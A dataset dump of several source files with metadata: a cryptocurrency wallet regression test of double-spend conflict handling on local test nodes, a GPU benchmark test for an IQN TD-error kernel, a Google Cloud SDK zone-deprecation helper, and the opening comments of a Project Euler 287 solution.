        # coins to node1_address, but don't broadcast:
        doublespend_fee = Decimal('-.02')
        rawtx_input_0 = {}
        rawtx_input_0["txid"] = fund_foo_txid
        rawtx_input_0["vout"] = find_output(self.nodes[0], fund_foo_txid, spend_from_foo)
        rawtx_input_1 = {}
        rawtx_input_1["txid"] = fund_bar_txid
        rawtx_input_1["vout"] = find_output(self.nodes[0], fund_bar_txid, spend_from_bar)
        inputs = [rawtx_input_0, rawtx_input_1]
        change_address = self.nodes[0].getnewaddress()
        outputs = {}
        outputs[node1_address] = spend_from_doublespend
        outputs[change_address] = spend_from_foo + spend_from_bar - spend_from_doublespend + doublespend_fee
        rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
        doublespend = self.nodes[0].signrawtransactionwithwallet(rawtx)
        assert_equal(doublespend["complete"], True)
        # Create two ordinary spends that will conflict with the
        # double-spend above (they draw from the same wallet coins):
        txid1 = self.nodes[0].sendtoaddress(node1_address, (INITIAL_BLOCK_REWARD/5) * 4)
        txid2 = self.nodes[0].sendtoaddress(node1_address, (INITIAL_BLOCK_REWARD/5) * 2)
        # Have node0 mine a block:
        if (self.options.mine_block):
            self.nodes[0].generate(1)
            sync_blocks(self.nodes[0:2])
        tx1 = self.nodes[0].gettransaction(txid1)
        tx2 = self.nodes[0].gettransaction(txid2)
        # Node0's balance should be starting balance, plus one block reward
        # if a block was mined, minus the two spent amounts and their fees:
        expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
        if self.options.mine_block:
            expected += INITIAL_BLOCK_REWARD
        expected += tx1["amount"] + tx1["fee"]
        expected += tx2["amount"] + tx2["fee"]
        assert_equal(self.nodes[0].getbalance(), expected)
        if self.options.mine_block:
            assert_equal(tx1["confirmations"], 1)
            assert_equal(tx2["confirmations"], 1)
            # Node1's balance should have grown by both transaction amounts
            # (amounts are negative from node0's perspective):
            assert_equal(self.nodes[1].getbalance(), starting_balance - (tx1["amount"]+tx2["amount"]))
        else:
            assert_equal(tx1["confirmations"], 0)
            assert_equal(tx2["confirmations"], 0)
        # Now give doublespend and its parents to miner:
        self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
        self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
        doublespend_txid = self.nodes[2].sendrawtransaction(doublespend["hex"])
        # ... mine a block...
        self.nodes[2].generate(1)
        # Reconnect the split network, and sync chain:
        connect_nodes(self.nodes[1], 2)
        self.nodes[2].generate(1) # Mine another block to make sure we sync
        sync_blocks(self.nodes)
        # The mined double-spend wins: 2 confirmations on the longer chain.
        assert_equal(self.nodes[0].gettransaction(doublespend_txid)["confirmations"], 2)
        # Re-fetch transaction info:
        tx1 = self.nodes[0].gettransaction(txid1)
        tx2 = self.nodes[0].gettransaction(txid2)
        # Both transactions should be conflicted
        assert_equal(tx1["confirmations"], -2)
        assert_equal(tx2["confirmations"], -2)
        # Node0's total balance should be starting balance, plus two more
        # matured block rewards, minus the double-spend amount, plus fees
        # (which are negative):
        expected = starting_balance + 2*INITIAL_BLOCK_REWARD - spend_from_doublespend + fund_foo_tx["fee"] + fund_bar_tx["fee"] + doublespend_fee
        assert_equal(self.nodes[0].getbalance(), expected)
        assert_equal(self.nodes[0].getbalance("*"), expected)
        # Final balance is starting_balance - doublespend + subsidies +
        # fees (which are negative)
        assert_equal(self.nodes[0].getbalance(), starting_balance
                                                 - spend_from_doublespend
                                                 + 2*INITIAL_BLOCK_REWARD
                                                 + fund_foo_tx["fee"]
                                                 + fund_bar_tx["fee"]
                                                 + doublespend_fee)
# Entry point: run the functional test through the framework harness.
if __name__ == '__main__':
    TxnMallTest().main()
| 46.178808 | 145 | 0.641761 |
from decimal import Decimal
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.zerohourconfig import INITIAL_BLOCK_REWARD
class TxnMallTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 4
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
def setup_network(self):
super().setup_network()
disconnect_nodes(self.nodes[1], 2)
disconnect_nodes(self.nodes[2], 1)
def run_test(self):
starting_balance = 25*INITIAL_BLOCK_REWARD
for n in self.nodes:
assert n.getblockchaininfo()["initialblockdownload"] == False
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("")
spend_from_foo = starting_balance - INITIAL_BLOCK_REWARD*5
spend_from_bar = INITIAL_BLOCK_REWARD*5 - 100
spend_from_doublespend = spend_from_foo + spend_from_bar - 8
node0_address_foo = self.nodes[0].getnewaddress()
fund_foo_txid = self.nodes[0].sendtoaddress(node0_address_foo, spend_from_foo)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress()
fund_bar_txid = self.nodes[0].sendtoaddress(node0_address_bar, spend_from_bar)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(),
starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"])
node1_address = self.nodes[1].getnewaddress()
doublespend_fee = Decimal('-.02')
rawtx_input_0 = {}
rawtx_input_0["txid"] = fund_foo_txid
rawtx_input_0["vout"] = find_output(self.nodes[0], fund_foo_txid, spend_from_foo)
rawtx_input_1 = {}
rawtx_input_1["txid"] = fund_bar_txid
rawtx_input_1["vout"] = find_output(self.nodes[0], fund_bar_txid, spend_from_bar)
inputs = [rawtx_input_0, rawtx_input_1]
change_address = self.nodes[0].getnewaddress()
outputs = {}
outputs[node1_address] = spend_from_doublespend
outputs[change_address] = spend_from_foo + spend_from_bar - spend_from_doublespend + doublespend_fee
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
doublespend = self.nodes[0].signrawtransactionwithwallet(rawtx)
assert_equal(doublespend["complete"], True)
# Create two spends using 1 50 BTC coin each
txid1 = self.nodes[0].sendtoaddress(node1_address, (INITIAL_BLOCK_REWARD/5) * 4)
txid2 = self.nodes[0].sendtoaddress(node1_address, (INITIAL_BLOCK_REWARD/5) * 2)
# Have node0 mine a block:
if (self.options.mine_block):
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 50BTC for another
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block:
expected += INITIAL_BLOCK_REWARD
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
assert_equal(self.nodes[1].getbalance(), starting_balance - (tx1["amount"]+tx2["amount"]))
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Now give doublespend and its parents to miner:
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
doublespend_txid = self.nodes[2].sendrawtransaction(doublespend["hex"])
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].generate(1) # Mine another block to make sure we sync
sync_blocks(self.nodes)
assert_equal(self.nodes[0].gettransaction(doublespend_txid)["confirmations"], 2)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Both transactions should be conflicted
assert_equal(tx1["confirmations"], -2)
assert_equal(tx2["confirmations"], -2)
# Node0's total balance should be starting balance, plus 100BTC for
expected = starting_balance + 2*INITIAL_BLOCK_REWARD - spend_from_doublespend + fund_foo_tx["fee"] + fund_bar_tx["fee"] + doublespend_fee
assert_equal(self.nodes[0].getbalance(), expected)
assert_equal(self.nodes[0].getbalance("*"), expected)
assert_equal(self.nodes[0].getbalance(), starting_balance
- spend_from_doublespend
+ 2*INITIAL_BLOCK_REWARD
+ fund_foo_tx["fee"]
+ fund_bar_tx["fee"]
+ doublespend_fee)
if __name__ == '__main__':
TxnMallTest().main()
| true | true |
79010f186d2da99e9bc0099a880f3e7a056a1dbe | 6,308 | py | Python | tests/test_iqn_nstep_td_error.py | opendilab/DI-hpc | 8f001382cd1c0119013e1d0d0e98ff41c751d8a2 | [
"Apache-2.0"
] | 64 | 2021-07-08T02:18:08.000Z | 2022-02-28T09:52:57.000Z | tests/test_iqn_nstep_td_error.py | opendilab/DI-hpc | 8f001382cd1c0119013e1d0d0e98ff41c751d8a2 | [
"Apache-2.0"
] | null | null | null | tests/test_iqn_nstep_td_error.py | opendilab/DI-hpc | 8f001382cd1c0119013e1d0d0e98ff41c751d8a2 | [
"Apache-2.0"
] | 3 | 2021-07-14T08:58:45.000Z | 2022-03-30T12:36:46.000Z | import time
import torch
from hpc_rll.origin.td import iqn_nstep_td_error, iqn_nstep_td_data
from hpc_rll.rl_utils.td import IQNNStepTDError
from testbase import mean_relative_error, times
# Fail fast: both the reference and HPC paths below run on the GPU.
assert torch.cuda.is_available()
use_cuda = True
# Benchmark problem dimensions (echoed by the printout in __main__).
tau = 33  # quantile sample count of the current distribution (IQN convention -- confirm)
tauPrime = 34  # quantile sample count of the target distribution (confirm)
T = 10  # n-step horizon (timesteps)
B = 64  # batch size
N = 8  # number of discrete actions
gamma = 0.95  # discount factor
kappa = 0.9  # Huber-loss threshold passed to the TD error (presumed -- confirm)
def iqn_val():
    """Validate the HPC IQN n-step TD error against the reference version.

    Builds one set of random inputs, feeds identical copies through the
    reference implementation (``iqn_nstep_td_error``) and the fused HPC
    module (``IQNNStepTDError``), runs forward and backward once for each,
    and prints the mean relative error of the losses (fp) and of the
    gradients w.r.t. ``q`` (bp).
    """
    # Random inputs for the reference ("ori") path.
    ori_q = torch.randn(tau, B, N)
    ori_next_n_q = torch.randn(tauPrime, B, N)
    ori_action = torch.randint(0, N, size=(B, ))
    ori_next_n_action = torch.randint(0, N, size=(B, ))
    ori_reward = torch.randn(T, B)
    ori_done = torch.randn(B)
    ori_r_q = torch.randn(tau, B)
    ori_weight = torch.randn(B)
    ori_value_gamma = torch.randn(B)
    # Detached copies so the HPC ("hpc") path sees identical values but
    # keeps its own autograd graph.
    hpc_q = ori_q.clone().detach()
    hpc_next_n_q = ori_next_n_q.clone().detach()
    hpc_action = ori_action.clone().detach()
    hpc_next_n_action = ori_next_n_action.clone().detach()
    hpc_reward = ori_reward.clone().detach()
    hpc_done = ori_done.clone().detach()
    hpc_r_q = ori_r_q.clone().detach()
    hpc_weight = ori_weight.clone().detach()
    hpc_value_gamma = ori_value_gamma.clone().detach()
    hpc_iqn = IQNNStepTDError(tau, tauPrime, T, B, N)
    if use_cuda:
        # Move every tensor (and the HPC module) to the GPU.
        ori_q = ori_q.cuda()
        ori_next_n_q = ori_next_n_q.cuda()
        ori_action = ori_action.cuda()
        ori_next_n_action = ori_next_n_action.cuda()
        ori_reward = ori_reward.cuda()
        ori_done = ori_done.cuda()
        ori_r_q = ori_r_q.cuda()
        ori_weight = ori_weight.cuda()
        ori_value_gamma = ori_value_gamma.cuda()
        hpc_q = hpc_q.cuda()
        hpc_next_n_q = hpc_next_n_q.cuda()
        hpc_action = hpc_action.cuda()
        hpc_next_n_action = hpc_next_n_action.cuda()
        hpc_reward = hpc_reward.cuda()
        hpc_done = hpc_done.cuda()
        hpc_r_q = hpc_r_q.cuda()
        hpc_weight = hpc_weight.cuda()
        hpc_value_gamma = hpc_value_gamma.cuda()
        hpc_iqn = hpc_iqn.cuda()
    # Reference forward + backward.
    ori_q.requires_grad_(True)
    ori_loss, ori_ = iqn_nstep_td_error(iqn_nstep_td_data(ori_q, ori_next_n_q, ori_action, ori_next_n_action, ori_reward, ori_done, ori_r_q, ori_weight), gamma, T, kappa, ori_value_gamma)
    ori_loss = ori_loss.mean()
    ori_loss.backward()
    if use_cuda:
        torch.cuda.synchronize()
        # Bracket only the HPC section with the CUDA profiler.
        torch.cuda.cudart().cudaProfilerStart()
    # HPC forward + backward.
    hpc_q.requires_grad_(True)
    hpc_loss, hpc_ = hpc_iqn(hpc_q, hpc_next_n_q, hpc_action, hpc_next_n_action, hpc_reward, hpc_done, hpc_r_q, gamma, kappa, hpc_weight, hpc_value_gamma)
    hpc_loss = hpc_loss.mean()
    hpc_loss.backward()
    if use_cuda:
        torch.cuda.synchronize()
        torch.cuda.cudart().cudaProfilerStop()
    # Compare loss values (forward) and input gradients (backward).
    mre = mean_relative_error(torch.flatten(ori_loss).cpu().detach().numpy(), torch.flatten(hpc_loss).cpu().detach().numpy())
    print("iqn fp mean_relative_error: " + str(mre))
    mre = mean_relative_error(torch.flatten(ori_q.grad).cpu().detach().numpy(), torch.flatten(hpc_q.grad).cpu().detach().numpy())
    print("iqn bp mean_relative_error: " + str(mre))
def iqn_perf():
    """Benchmark the HPC IQN n-step TD error against the reference version.

    Runs ``times`` forward+backward iterations of each implementation,
    printing per-iteration wall-clock times, then prints the mean relative
    error of the final losses and of the accumulated input gradients.

    NOTE(review): ``.grad`` is never zeroed, so gradients accumulate over
    all iterations; both paths accumulate identically, so the final
    comparison remains apples-to-apples.
    """
    # Random inputs for the reference ("ori") path.
    ori_q = torch.randn(tau, B, N)
    ori_next_n_q = torch.randn(tauPrime, B, N)
    ori_action = torch.randint(0, N, size=(B, ))
    ori_next_n_action = torch.randint(0, N, size=(B, ))
    ori_reward = torch.randn(T, B)
    ori_done = torch.randn(B)
    ori_r_q = torch.randn(tau, B)
    ori_weight = torch.randn(B)
    ori_value_gamma = torch.randn(B)
    # Detached copies for the HPC ("hpc") path.
    hpc_q = ori_q.clone().detach()
    hpc_next_n_q = ori_next_n_q.clone().detach()
    hpc_action = ori_action.clone().detach()
    hpc_next_n_action = ori_next_n_action.clone().detach()
    hpc_reward = ori_reward.clone().detach()
    hpc_done = ori_done.clone().detach()
    hpc_r_q = ori_r_q.clone().detach()
    hpc_weight = ori_weight.clone().detach()
    hpc_value_gamma = ori_value_gamma.clone().detach()
    hpc_iqn = IQNNStepTDError(tau, tauPrime, T, B, N)
    if use_cuda:
        # Move every tensor (and the HPC module) to the GPU.
        ori_q = ori_q.cuda()
        ori_next_n_q = ori_next_n_q.cuda()
        ori_action = ori_action.cuda()
        ori_next_n_action = ori_next_n_action.cuda()
        ori_reward = ori_reward.cuda()
        ori_done = ori_done.cuda()
        ori_r_q = ori_r_q.cuda()
        ori_weight = ori_weight.cuda()
        ori_value_gamma = ori_value_gamma.cuda()
        hpc_q = hpc_q.cuda()
        hpc_next_n_q = hpc_next_n_q.cuda()
        hpc_action = hpc_action.cuda()
        hpc_next_n_action = hpc_next_n_action.cuda()
        hpc_reward = hpc_reward.cuda()
        hpc_done = hpc_done.cuda()
        hpc_r_q = hpc_r_q.cuda()
        hpc_weight = hpc_weight.cuda()
        hpc_iqn = hpc_iqn.cuda()
        hpc_value_gamma = hpc_value_gamma.cuda()
    # Timed reference iterations (synchronize so timings cover GPU work).
    ori_q.requires_grad_(True)
    for i in range(times):
        t = time.time()
        ori_loss, ori_ = iqn_nstep_td_error(iqn_nstep_td_data(ori_q, ori_next_n_q, ori_action, ori_next_n_action, ori_reward, ori_done, ori_r_q, ori_weight), gamma, T, kappa, ori_value_gamma)
        ori_loss = ori_loss.mean()
        ori_loss.backward()
        if use_cuda:
            torch.cuda.synchronize()
        print('epoch: {}, original iqn cost time: {}'.format(i, time.time() - t))
    #torch.cuda.cudart().cudaProfilerStart()
    # Timed HPC iterations.
    hpc_q.requires_grad_(True)
    for i in range(times):
        t = time.time()
        hpc_loss, hpc_ = hpc_iqn(hpc_q, hpc_next_n_q, hpc_action, hpc_next_n_action, hpc_reward, hpc_done, hpc_r_q, gamma, kappa, hpc_weight, hpc_value_gamma)
        hpc_loss = hpc_loss.mean()
        hpc_loss.backward()
        if use_cuda:
            torch.cuda.synchronize()
        print('epoch: {}, hpc iqn cost time: {}'.format(i, time.time() - t))
    #torch.cuda.cudart().cudaProfilerStop()
    # Compare last-iteration losses and accumulated input gradients.
    mre = mean_relative_error(torch.flatten(ori_loss).cpu().detach().numpy(), torch.flatten(hpc_loss).cpu().detach().numpy())
    print("iqn fp mean_relative_error: " + str(mre))
    mre = mean_relative_error(torch.flatten(ori_q.grad).cpu().detach().numpy(), torch.flatten(hpc_q.grad).cpu().detach().numpy())
    print("iqn bp mean_relative_error: " + str(mre))
# Entry point: print the problem size, run the correctness validation,
# then the timing benchmark.
if __name__ == '__main__':
    print("target problem: tau = {}, tauPrime = {}, T = {}, B = {}, N = {}, gamma = {}, kappa = {}".format(tau, tauPrime, T, B, N, gamma, kappa))
    print("================run iqn validation test================")
    iqn_val()
    print("================run iqn performance test================")
    iqn_perf()
| 39.425 | 191 | 0.656309 | import time
import torch
from hpc_rll.origin.td import iqn_nstep_td_error, iqn_nstep_td_data
from hpc_rll.rl_utils.td import IQNNStepTDError
from testbase import mean_relative_error, times
assert torch.cuda.is_available()
use_cuda = True
tau = 33
tauPrime = 34
T = 10
B = 64
N = 8
gamma = 0.95
kappa = 0.9
def iqn_val():
ori_q = torch.randn(tau, B, N)
ori_next_n_q = torch.randn(tauPrime, B, N)
ori_action = torch.randint(0, N, size=(B, ))
ori_next_n_action = torch.randint(0, N, size=(B, ))
ori_reward = torch.randn(T, B)
ori_done = torch.randn(B)
ori_r_q = torch.randn(tau, B)
ori_weight = torch.randn(B)
ori_value_gamma = torch.randn(B)
hpc_q = ori_q.clone().detach()
hpc_next_n_q = ori_next_n_q.clone().detach()
hpc_action = ori_action.clone().detach()
hpc_next_n_action = ori_next_n_action.clone().detach()
hpc_reward = ori_reward.clone().detach()
hpc_done = ori_done.clone().detach()
hpc_r_q = ori_r_q.clone().detach()
hpc_weight = ori_weight.clone().detach()
hpc_value_gamma = ori_value_gamma.clone().detach()
hpc_iqn = IQNNStepTDError(tau, tauPrime, T, B, N)
if use_cuda:
ori_q = ori_q.cuda()
ori_next_n_q = ori_next_n_q.cuda()
ori_action = ori_action.cuda()
ori_next_n_action = ori_next_n_action.cuda()
ori_reward = ori_reward.cuda()
ori_done = ori_done.cuda()
ori_r_q = ori_r_q.cuda()
ori_weight = ori_weight.cuda()
ori_value_gamma = ori_value_gamma.cuda()
hpc_q = hpc_q.cuda()
hpc_next_n_q = hpc_next_n_q.cuda()
hpc_action = hpc_action.cuda()
hpc_next_n_action = hpc_next_n_action.cuda()
hpc_reward = hpc_reward.cuda()
hpc_done = hpc_done.cuda()
hpc_r_q = hpc_r_q.cuda()
hpc_weight = hpc_weight.cuda()
hpc_value_gamma = hpc_value_gamma.cuda()
hpc_iqn = hpc_iqn.cuda()
ori_q.requires_grad_(True)
ori_loss, ori_ = iqn_nstep_td_error(iqn_nstep_td_data(ori_q, ori_next_n_q, ori_action, ori_next_n_action, ori_reward, ori_done, ori_r_q, ori_weight), gamma, T, kappa, ori_value_gamma)
ori_loss = ori_loss.mean()
ori_loss.backward()
if use_cuda:
torch.cuda.synchronize()
torch.cuda.cudart().cudaProfilerStart()
hpc_q.requires_grad_(True)
hpc_loss, hpc_ = hpc_iqn(hpc_q, hpc_next_n_q, hpc_action, hpc_next_n_action, hpc_reward, hpc_done, hpc_r_q, gamma, kappa, hpc_weight, hpc_value_gamma)
hpc_loss = hpc_loss.mean()
hpc_loss.backward()
if use_cuda:
torch.cuda.synchronize()
torch.cuda.cudart().cudaProfilerStop()
mre = mean_relative_error(torch.flatten(ori_loss).cpu().detach().numpy(), torch.flatten(hpc_loss).cpu().detach().numpy())
print("iqn fp mean_relative_error: " + str(mre))
mre = mean_relative_error(torch.flatten(ori_q.grad).cpu().detach().numpy(), torch.flatten(hpc_q.grad).cpu().detach().numpy())
print("iqn bp mean_relative_error: " + str(mre))
def iqn_perf():
ori_q = torch.randn(tau, B, N)
ori_next_n_q = torch.randn(tauPrime, B, N)
ori_action = torch.randint(0, N, size=(B, ))
ori_next_n_action = torch.randint(0, N, size=(B, ))
ori_reward = torch.randn(T, B)
ori_done = torch.randn(B)
ori_r_q = torch.randn(tau, B)
ori_weight = torch.randn(B)
ori_value_gamma = torch.randn(B)
hpc_q = ori_q.clone().detach()
hpc_next_n_q = ori_next_n_q.clone().detach()
hpc_action = ori_action.clone().detach()
hpc_next_n_action = ori_next_n_action.clone().detach()
hpc_reward = ori_reward.clone().detach()
hpc_done = ori_done.clone().detach()
hpc_r_q = ori_r_q.clone().detach()
hpc_weight = ori_weight.clone().detach()
hpc_value_gamma = ori_value_gamma.clone().detach()
hpc_iqn = IQNNStepTDError(tau, tauPrime, T, B, N)
if use_cuda:
ori_q = ori_q.cuda()
ori_next_n_q = ori_next_n_q.cuda()
ori_action = ori_action.cuda()
ori_next_n_action = ori_next_n_action.cuda()
ori_reward = ori_reward.cuda()
ori_done = ori_done.cuda()
ori_r_q = ori_r_q.cuda()
ori_weight = ori_weight.cuda()
ori_value_gamma = ori_value_gamma.cuda()
hpc_q = hpc_q.cuda()
hpc_next_n_q = hpc_next_n_q.cuda()
hpc_action = hpc_action.cuda()
hpc_next_n_action = hpc_next_n_action.cuda()
hpc_reward = hpc_reward.cuda()
hpc_done = hpc_done.cuda()
hpc_r_q = hpc_r_q.cuda()
hpc_weight = hpc_weight.cuda()
hpc_iqn = hpc_iqn.cuda()
hpc_value_gamma = hpc_value_gamma.cuda()
ori_q.requires_grad_(True)
for i in range(times):
t = time.time()
ori_loss, ori_ = iqn_nstep_td_error(iqn_nstep_td_data(ori_q, ori_next_n_q, ori_action, ori_next_n_action, ori_reward, ori_done, ori_r_q, ori_weight), gamma, T, kappa, ori_value_gamma)
ori_loss = ori_loss.mean()
ori_loss.backward()
if use_cuda:
torch.cuda.synchronize()
print('epoch: {}, original iqn cost time: {}'.format(i, time.time() - t))
hpc_q.requires_grad_(True)
for i in range(times):
t = time.time()
hpc_loss, hpc_ = hpc_iqn(hpc_q, hpc_next_n_q, hpc_action, hpc_next_n_action, hpc_reward, hpc_done, hpc_r_q, gamma, kappa, hpc_weight, hpc_value_gamma)
hpc_loss = hpc_loss.mean()
hpc_loss.backward()
if use_cuda:
torch.cuda.synchronize()
print('epoch: {}, hpc iqn cost time: {}'.format(i, time.time() - t))
mre = mean_relative_error(torch.flatten(ori_loss).cpu().detach().numpy(), torch.flatten(hpc_loss).cpu().detach().numpy())
print("iqn fp mean_relative_error: " + str(mre))
mre = mean_relative_error(torch.flatten(ori_q.grad).cpu().detach().numpy(), torch.flatten(hpc_q.grad).cpu().detach().numpy())
print("iqn bp mean_relative_error: " + str(mre))
if __name__ == '__main__':
print("target problem: tau = {}, tauPrime = {}, T = {}, B = {}, N = {}, gamma = {}, kappa = {}".format(tau, tauPrime, T, B, N, gamma, kappa))
print("================run iqn validation test================")
iqn_val()
print("================run iqn performance test================")
iqn_perf()
| true | true |
79010f19134681f4a4139685bf23c998b96ba2ab | 4,488 | py | Python | lib/googlecloudsdk/api_lib/compute/zone_utils.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | null | null | null | lib/googlecloudsdk/api_lib/compute/zone_utils.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | 11 | 2020-02-29T02:51:12.000Z | 2022-03-30T23:20:08.000Z | lib/googlecloudsdk/api_lib/compute/zone_utils.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | 1 | 2020-07-24T18:47:35.000Z | 2020-07-24T18:47:35.000Z | # -*- coding: utf-8 -*- #
# Copyright 2014 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common classes and functions for zones."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.compute import request_helper
from googlecloudsdk.api_lib.compute import utils
from googlecloudsdk.calliope import exceptions as calliope_exceptions
from googlecloudsdk.core.console import console_io
class ZoneResourceFetcher(object):
  """A (small) collection of utils for working with zones."""

  def __init__(self, compute_client):
    """Instantiate ZoneResourceFetcher and embed all required data into it.

    ZoneResourceFetcher is a class depending on "base_classes"
    class layout (properties side-derived from one of base_class class). This
    function can be used to avoid unfeasible inheritance and use composition
    instead when refactoring away from base_classes into stateless style.

    This constructor embeds the following properties into ZoneResourceFetcher
    instance:
     - compute
     - messages
     - http
     - batch_url

    Example:
      compute_holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
      client = compute_holder.client
      zone_resource_fetcher = ZoneResourceFetcher(client)

    Args:
      compute_client: compute_holder.client
    """
    self._compute = compute_client.apitools_client
    self._messages = compute_client.messages
    self._http = compute_client.apitools_client.http
    self._batch_url = compute_client.batch_url

  def GetZones(self, resource_refs):
    """Fetches zone resources.

    Args:
      resource_refs: resource references carrying `project` and `zone`.

    Returns:
      A list of zone messages, or None if any request failed.
    """
    errors = []
    requests = []
    zone_names = set()
    for resource_ref in resource_refs:
      # Issue at most one Get request per distinct zone name.
      if resource_ref.zone not in zone_names:
        zone_names.add(resource_ref.zone)
        requests.append((
            self._compute.zones,
            'Get',
            self._messages.ComputeZonesGetRequest(
                project=resource_ref.project,
                zone=resource_ref.zone)))
    res = list(request_helper.MakeRequests(
        requests=requests,
        http=self._http,
        batch_url=self._batch_url,
        errors=errors))
    if errors:
      return None
    else:
      return res

  def WarnForZonalCreation(self, resource_refs):
    """Warns the user if a zone has upcoming deprecation."""
    zones = self.GetZones(resource_refs)
    if not zones:
      return
    zones_with_deprecated = [zone for zone in zones if zone.deprecated]
    if not zones_with_deprecated:
      return
    # Grammar depends on whether one or several zones are deprecated.
    if len(zones_with_deprecated) == 1:
      phrases = ('zone is', 'this zone', 'the')
    else:
      phrases = ('zones are', 'these zones', 'their')
    title = ('\n'
             'WARNING: The following selected {0} deprecated.'
             ' All resources in {1} will be deleted after'
             ' {2} turndown date.'.format(phrases[0], phrases[1], phrases[2]))
    printable_deprecated_zones = []
    for zone in zones_with_deprecated:
      if zone.deprecated.deleted:
        # Include the scheduled deletion date when the API provides one.
        printable_deprecated_zones.append(('[{0}] {1}').format(zone.name,
                                                               zone.deprecated
                                                               .deleted))
      else:
        printable_deprecated_zones.append('[{0}]'.format(zone.name))
    final_message = utils.ConstructList(title, printable_deprecated_zones)
    if not console_io.PromptContinue(message=final_message):
      raise calliope_exceptions.ToolException('Creation aborted by user.')
| 35.0625 | 80 | 0.679367 |
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.compute import request_helper
from googlecloudsdk.api_lib.compute import utils
from googlecloudsdk.calliope import exceptions as calliope_exceptions
from googlecloudsdk.core.console import console_io
class ZoneResourceFetcher(object):
def __init__(self, compute_client):
self._compute = compute_client.apitools_client
self._messages = compute_client.messages
self._http = compute_client.apitools_client.http
self._batch_url = compute_client.batch_url
def GetZones(self, resource_refs):
errors = []
requests = []
zone_names = set()
for resource_ref in resource_refs:
if resource_ref.zone not in zone_names:
zone_names.add(resource_ref.zone)
requests.append((
self._compute.zones,
'Get',
self._messages.ComputeZonesGetRequest(
project=resource_ref.project,
zone=resource_ref.zone)))
res = list(request_helper.MakeRequests(
requests=requests,
http=self._http,
batch_url=self._batch_url,
errors=errors))
if errors:
return None
else:
return res
def WarnForZonalCreation(self, resource_refs):
zones = self.GetZones(resource_refs)
if not zones:
return
prompts = []
zones_with_deprecated = []
for zone in zones:
if zone.deprecated:
zones_with_deprecated.append(zone)
if not zones_with_deprecated:
return
if zones_with_deprecated:
phrases = []
if len(zones_with_deprecated) == 1:
phrases = ('zone is', 'this zone', 'the')
else:
phrases = ('zones are', 'these zones', 'their')
title = ('\n'
'WARNING: The following selected {0} deprecated.'
' All resources in {1} will be deleted after'
' {2} turndown date.'.format(phrases[0], phrases[1], phrases[2]))
printable_deprecated_zones = []
for zone in zones_with_deprecated:
if zone.deprecated.deleted:
printable_deprecated_zones.append(('[{0}] {1}').format(zone.name,
zone.deprecated
.deleted))
else:
printable_deprecated_zones.append('[{0}]'.format(zone.name))
prompts.append(utils.ConstructList(title, printable_deprecated_zones))
final_message = ' '.join(prompts)
if not console_io.PromptContinue(message=final_message):
raise calliope_exceptions.ToolException('Creation aborted by user.')
| true | true |
79010f9ce34ee46f7f5afed5ce86db595bcde4be | 3,739 | py | Python | solutions/p287.py | xianlinfeng/project_euler_python3 | 77eca44eb2b1d13bc70d6dc0258b737449d43a23 | [
"MIT"
] | null | null | null | solutions/p287.py | xianlinfeng/project_euler_python3 | 77eca44eb2b1d13bc70d6dc0258b737449d43a23 | [
"MIT"
] | null | null | null | solutions/p287.py | xianlinfeng/project_euler_python3 | 77eca44eb2b1d13bc70d6dc0258b737449d43a23 | [
"MIT"
] | null | null | null | #
# Solution to Project Euler problem 287
# Copyright (c) Project Nayuki. All rights reserved.
#
# https://www.nayuki.io/page/project-euler-solutions
# https://github.com/nayuki/Project-Euler-solutions
#
# Let R = 2^(N-1) denote the radius of the circle (filled disk) being drawn.
#
# First, we can simplify the problem by translating (shifting) the coordinate system.
# Instead of x and y each in [0, 2^N) for the formula [x - 2^(N-1)]^2 + [y - 2^(N-1)]^2 <= R^2,
# we shall consider x and y each in [-(2^(N-1)), 2^(N-1)) for the formula x^2 + y^2 <= R^2.
#
